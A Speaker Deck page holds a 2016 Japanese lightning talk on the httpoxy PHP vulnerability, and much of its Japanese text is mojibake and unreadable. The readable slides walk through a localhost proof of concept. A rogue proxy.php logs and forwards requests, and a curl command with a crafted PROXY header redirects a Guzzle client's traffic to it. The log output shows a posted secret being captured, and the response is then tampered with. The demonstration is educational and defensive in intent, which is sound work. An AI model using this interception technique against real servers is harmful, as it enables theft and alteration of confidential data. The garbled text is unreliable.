Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5
Search
uzulla
July 20, 2016
Technology
10
6k
初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5
PHPBLT #5でほぼしゃべらなかったLTの資料です。
uzulla
July 20, 2016
Tweet
Share
More Decks by uzulla
See All by uzulla
PHPer's Guide to Daemon Crafting Taming and Summoning
uzulla
2
1.5k
似たもの同士のPerlとPHP
uzulla
1
220
More Context, Better Code. 既存コードやOAS等をコンテキストとしてLLMに与える事で、よりよいコード生成を行う話
uzulla
1
160
あなたのアプリ、ログはでてますか?あるいはログをだしてますか? (Funabashi.dev用 軽量版)
uzulla
3
250
セッションのトークセッション / Traps for PHP session features in growing web apps
uzulla
2
170
Crafting a Own PHP - ウキウキ手作りミニマリストPHP
uzulla
5
2.5k
例外を投げるのをやめてみないか? あるいは受け入れてみないか? - How to use exceptions other than throwing
uzulla
5
1.1k
PHPerが ISUCONでやるべき事
uzulla
1
1.3k
開発生産性は上がらない - N Ways to Reduce Development Productivity
uzulla
1
300
Other Decks in Technology
See All in Technology
無意味な開発生産性の議論から抜け出すための予兆検知とお金とAI
i35_267
0
300
CI/CD/IaC 久々に0から環境を作ったらこうなりました
kaz29
1
200
生まれ変わった AWS Security Hub (Preview) を紹介 #reInforce_osaka / reInforce New Security Hub
masahirokawahara
0
350
生成AI活用の組織格差を解消する 〜ビジネス職のCursor導入が開発効率に与えた好循環〜 / Closing the Organizational Gap in AI Adoption
upamune
5
4.4k
製造業からパッケージ製品まで、あらゆる領域をカバー!生成AIを利用したテストシナリオ生成 / 20250627 Suguru Ishii
shift_evolve
PRO
1
160
Connect 100+を支える技術
kanyamaguc
0
110
GeminiとNotebookLMによる金融実務の業務革新
abenben
0
240
Witchcraft for Memory
pocke
1
650
ネットワーク保護はどう変わるのか?re:Inforce 2025最新アップデート解説
tokushun
0
140
Tech-Verse 2025 Global CTO Session
lycorptech_jp
PRO
0
1k
タイミーのデータモデリング事例と今後のチャレンジ
ttccddtoki
1
260
急成長を支える基盤作り〜地道な改善からコツコツと〜 #cre_meetup
stefafafan
0
150
Featured
See All Featured
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
357
30k
Adopting Sorbet at Scale
ufuk
77
9.4k
Documentation Writing (for coders)
carmenintech
72
4.9k
Being A Developer After 40
akosma
90
590k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
29
1.8k
What's in a price? How to price your products and services
michaelherold
246
12k
How GitHub (no longer) Works
holman
314
140k
Practical Orchestrator
shlominoach
188
11k
Become a Pro
speakerdeck
PRO
28
5.4k
What’s in a name? Adding method to the madness
productmarketing
PRO
23
3.5k
The Invisible Side of Design
smashingmag
300
51k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
2.9k
Transcript
PHPBLT#5 Httpoxyͱ͔ͷ 20160720 uzulla
ࣗݾհ • Junichi Ishida aka uzulla • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢ • HachiojiͳΜͨΒͱ͔
• ͳΜͨΒHacjioji in ͱ͔
Httpoxy • https:/ /httpoxy.org/ • ࡉͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦ͷϦΫΤε τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ • ΞϓϦ͔Βଞͷαʔόʔͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ •
͋Δ͍ɺվ͟ΜͰ͖ΔՄೳੑ • ΈΜͳௐࠪࡁΈͩΑͶʂʁ • ʢΈΜͳ͍ͬͯͨΒϖʔδඈ͢ʣ
None
• ʮCLIͰΑ͋͘Δ༷ʯͱʮCGIͷ༷ʯͷিಥ͕ݪҼ • HTTP_PROXYڥมͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ ͕Α͋͘Δ • ΣϒΞϓϦʹʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣPHPͰ CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ • ͯ͞ɺCGIͷ༷Ͱʢྫ͑ʣHOGEͱ͍͏ϦΫΤετϔομ
ʔΛHTTP_HOGEڥมʹอଘ͢Δͷ͕ͩ…ɻ • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏ڥม͕ ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ
• CGIϦεϖΫτͳPHPmod_phpfastcgi͜ͷ༷ • ͳ͓ɺPHPࣗମ͜ͷ੬ऑੑӨڹ͠ͳ͍ • օେ͖file_get_contentsӨڹͳ͍ • ͕Μͬͯ࡞Γ͜·ͳ͚ΕӨڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ • HTTP_PROXYΛड͚ೖΕΔදతͳϥΠϒϥϦͱͯ͠guzzle
• 6.2.1Ͱमਖ਼ • guzzle࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠ΘΕ͍ͯ ΔɺͳͷͰʹͳͬͨͷͰͨ͠ʂ
ͳ͓… • ઃఆͰ͖ΔͷHTTP_PROXYڥมͰ͋ͬͯɺHTTPS_PROXY ڥมࢦఆͰ͖ͳ͍ • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ • ͭ·ΓɺͬऔΕΔͷHTTP • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ
• େͷϠόΠใHTTPSͩΖ͏…ଟ…ɻ
ΦνͱͳΔରࡦ • !ΣϒαʔόͰɺPHPͷࣄલʹϔομʔΛམͱ͢ • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢ • ίʔυΛ͢ • ϥΠϒϥϦͷόʔδϣϯΞοϓ •
❌ʮίʔυઌ಄ͱ͔Ͱڥม্ॻ͖͢Ε͍͍ͷͰʁʯ ʮ೦ͳΒແཧͳͷͰ͢ʯ
͜͜·Ͱօ͞Μ͝ଘ͡ • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ • ʮࣗͰʯௐࠪରԠͯ͠·͔͢ʁ • ʮࣗͰʯීஈ͔Βใऩूͯ͠·͔͢ʁ •
ʢͳ͓ϑϦʔλʔݽಠͳͷͰવηϧϑαʔϏε…ʣ
ࢼͯ͠·͔͢ʁ • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ • ੬ऑੑࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ • ௨ৗࣗͰ࣮͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ ଟ͍ • Proof
of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ • ʢ࠷ۙࢮޠɿexploit codeʣ
ࢼͦ͏ʂ • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ
• PoCͲ͜ʹ͋Δ͔ʁ • CVEʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱͳ͍ɺͷͰ୳͢ • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ͍ΔͷͰ… • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢExploitʣઈରʹ࣮ߦ͢Δͳʂʂʂ • CVEͱ͔ʹͬͯΔౕେৎͩΖ͏͕ɺྑͷExploitഁ
յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ • ࠓճhttpoxy͕ެ։͍ͯͨ͠ • https:/ /github.com/httpoxy/php-fpm-httpoxy-poc
// ݩͷίʔυ͜ͷΑ͏ͳײ͡ // "guzzlehttp/guzzle": "~6.0" $client = new GuzzleHttp\Client(); $client->request(
'POST', 'http://my-internal-microservice.example.com/', ['secret' => 'some-really-secret-string'] ); echo "Request sent\n";
// ͦͷ··Ͱ͑ͳ͍ͷͰɺίʔυमਖ਼ // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ require 'vendor/autoload.php'; $client =
new GuzzleHttp\Client(); $res = $client->request( 'POST', 'http://127.0.0.1:8002/api.php?himi=tsu', ['form_params' => ['secret' => 'I_AM_PHPER']] ); echo $res->getBody();
API(?!)Λ࡞ <?php // api.php echo "BLT!BLT!";
ΞϓϦͱAPI(?!)Λىಈ $ composer install $ php -S 127.0.0.1:8001 index.php #
ผγΣϧͰ $ php -S 127.0.0.1:8002 api.php
ͨΊͯ͠ΈΔ $ curl 'http://localhost:8001/' BLT!BLT! • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK
ѱҙ͋ΔProxyΛ༻ҙ͢Δ • ͝ՈఉʹProxy͕͋Δํෆཁ • Charlesͱ͔ • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙͳʹ͕ϋϠϦͳͷʁ)
ѱҙ()͋ΔࡶͳproxyΛॻ͘ <?php $uri = $_SERVER['REQUEST_URI']; $body = file_get_contents('php://input'); $method =
$_SERVER['REQUEST_METHOD']; error_log($body); error_log(print_r($_SERVER,1)); require 'vendor/autoload.php'; $client = new GuzzleHttp\Client(); $res = $client->request($method, $uri, ['body' => $body]); echo $res->getBody();
ࡶͳProxyʹ͍ͭͯ • ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ • దʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ ʢproxy͔ͩΒͶ…ʣ • ͜ͷίʔυࡶͰةݥͳͷͰ࣮ݧҎ֎ʹઈରʹ͏ͳΑʂ • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ
ࡶͳproxy্ཱͪ͛ $ php -S 127.0.0.1:8003 proxy.php
࣮ࡍʹ੬ऑੑΛςετͩʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!
• ʮ೦͜ΕͰ͏͖͝·ͤΜʯ • ͳΜͱbuiltin server ੬ऑੑ͕ͳ͍ʂ͆ • ͱ͍͏͜ͱͰɺ࡞apachehereΛ͔ͭ͏(ͳΜͰ͍͍͚Ͳ) • https:/
/github.com/uzulla/apachehere $ apachehere -p 8001 DocumentRoot : /xxx php-cgi open : http://127.0.0.1:8001/ <snip> [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php
ϦτϥΠʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!
ޭ͢Δͱproxyͷϩάʹ… [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20
02:01:43 2016] Array ( [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc [REMOTE_ADDR] => 127.0.0.1 [REMOTE_PORT] => 53696 [SERVER_SOFTWARE] => PHP 7.0.3 Development Server [SERVER_PROTOCOL] => HTTP/1.1 [SERVER_NAME] => 127.0.0.1 [SERVER_PORT] => 8003 [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu [REQUEST_METHOD] => POST [SCRIPT_NAME] => /api.php [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php [PHP_SELF] => /api.php [QUERY_STRING] => himi=tsu [HTTP_HOST] => 127.0.0.1:8002 [HTTP_PROXY_CONNECTION] => Keep-Alive [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3 [CONTENT_TYPE] => application/x-www-form-urlencoded [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded [CONTENT_LENGTH] => 17 [HTTP_CONTENT_LENGTH] => 17 [REQUEST_TIME_FLOAT] => 1468947703.6871 [REQUEST_TIME] => 1468947703 )
[Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20 02:01:43
2016] Array ( snip [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ
proxyΛमਖ਼͢Ε… // proxy.php //echo $res->getBody(); echo "ീԦࢠʂീԦࢠʂ"; • ͱमਖ਼ͯ͠ $
curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' ീԦࢠʂീԦࢠʂ • վ͟ΜޭͰ͢Ͷʂ
ͱ͍͏͜ͱͰɺ • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷॏཁɺษڧʹͳΔ • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ
͋ͱɺ৻ॏʹͶʂ • ύονόʔδϣϯΛ͘Έ͍͚ͯͳ͍ • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮ʯ exception: php_sapi_name() has been disabled
for security reasons. It can be re-enabled by adding it to the google_app_engine.enable_functions ini variable in your applications php.ini • ʮGAE ͕ѱ͍ ͷ༷Ͱʁʯʮ͔ͨ͠ʹʯ
ͰυίͰΔ͔ʁ • օ͞ΜͲ͜Ͱͬͯ·͔͢ʁ
ΛΥον͠ଓ͚Δ • ໘͕ͩࣄͩʂ • TwitterͳͲSNSͰΔ • CVEͳͲΛߪಡ͢Δ • χϡʔεαΠτΛߪಡ͢Δ •
ެࣜϦϦʔεΛߪಡ͢Δ
TwitterͳͲSNS • ใੑ͕ߴ͍ɺ5ׂ͘Β͍͜͜ͰଘࡏΛΔࣄʹͳΔ • ʢPHPͷਓͰͳ͆͘ʣJSɺGoɺPerlΠϯϑϥํ໘ͳͲͷਓΛ ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ • ৄ͍͠ਓવʹ͢Δ͜ͱ͕ଟ͍͠ɺ ʢΘ͔͍ͬͯΔͷͰʣҰ࣍ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍
ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ • http:/ /jvn.jp/report/ • JVNɺຊޠɺ·͚ͣͩ͜͜Ͱྑ͍ʢͱࢥ͏ʣ • Feed͋ΔΑ • https:/
/www.jpcert.or.jp/ • JPCERTɺϝϧϚΨ͋ΔΑʂ
• https:/ /nvd.nist.gov/download.cfm • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར • CVE΄΅Ұ࣍ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ • https:/ /security.sensiolabs.org/database
• PHPϥΠϒϥϦͷใɺFeed͕͋ΔͷͰศར
ҰൠతͳχϡʔεαΠτ • ҰൠతͳITܥχϡʔεαΠτ…ຊจಡ·ͣʹ͙͢ʹϦϯΫઌ ͷҰ࣍ใݴͬͨํ͕ྑ͍…ɻ
• reddit֤छɺใੑߴ͍͕ίϝϯτ͙͢ʹ৴༻͠ͳ͍Α͏ʹ • https:/ /www.reddit.com/r/netsec • https:/ /www.reddit.com/r/sysadmin • https:/
/www.reddit.com/r/PHP • hackernewsɺ͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘ • https:/ /news.ycombinator.com/news
ެࣜαΠτ • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ • ͕͔͍ࣗͭͬͯΔϑϨʔϜϫʔΫϥΠϒϥϦPHPͷϦϦ ʔεͱ͔Έͯྑ͍ͷͰʁʁ
blog • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔ • ηΩϡϦςΟاۀͷϒϩάΑ͍ • વ͚ͩͲɺཏੑ͕ͳ͍ • ʮ୯ޠʯΛͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰΑ͍ •
झຯ͕ͰΔͷͰলུ
Branded Vulnerability ͳαΠτ • ࠷ۙΩϟονʔͳ໊લ͕͘ɺHttpoxyͦ͏ • GHOST,FREAK,POODLEʑ • ·ͱΊαΠτΈ͍ͨͳͷɺγΣΞ͘͢͠ΩϟονʔͳΞΠ ίϯ͕͋ͬͨΓͯ͠Α͍
• ଟ͘ͷ߹CVEΑΓΘ͔Γ͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ ͰOK͕ͩɺӳޠͰ͢ɻ • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱͳ͍ɺٯ·͔ͨ͠Γ
ใΩϟον·ͱΊ • ΥονʹRSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱͳ͍͆ʣ • JPCERTͱJVN͘Β͍ొͯ͠Α͍ͷͰ • Branded VulnerabilityͳαΠτ͕͋Ε·ͣνΣοΫ •
ӳޠ͕ॏཁʢʣ • ༁ղઆهࣄҰ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚ Ε߄ͯͣʹਖ਼࠲ͯͭ͜͠ͱ
That's all folks! • ੬ऑੑࣗͰͨΊͦ͏ʂ • χϡʔεΛͪΌΜͱݟΑ͏ʂ • ͪΌΜͱ੬ऑੑΛѲͯ͜͠ʂ •
Httpoxyɺ͋Μ·Γखͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ // enjoy ! $ grep -r HTTP_PROXY /your/codes/